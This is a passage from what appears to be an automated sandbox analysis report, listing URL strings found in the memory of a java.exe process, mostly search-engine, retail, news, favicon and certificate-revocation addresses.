Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: java.exe, 00000002.00000002.385608317.0000000016480000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: 1.cache[1].js.6.dr	String found in binary or memory: http://truste.com/go.htm?dcme
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: java.exe, 00000002.00000002.385608317.0000000016480000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.5.dr	String found in binary or memory: http://www.amazon.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp, java.exe, 00000002.00000002.378777753.0000000004E4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: java.exe, 00000002.00000002.378777753.0000000004E4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.orgs
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.5.dr	String found in binary or memory: http://www.google.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.5.dr	String found in binary or memory: http://www.live.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.5.dr	String found in binary or memory: http://www.nytimes.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.5.dr	String found in binary or memory: http://www.reddit.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
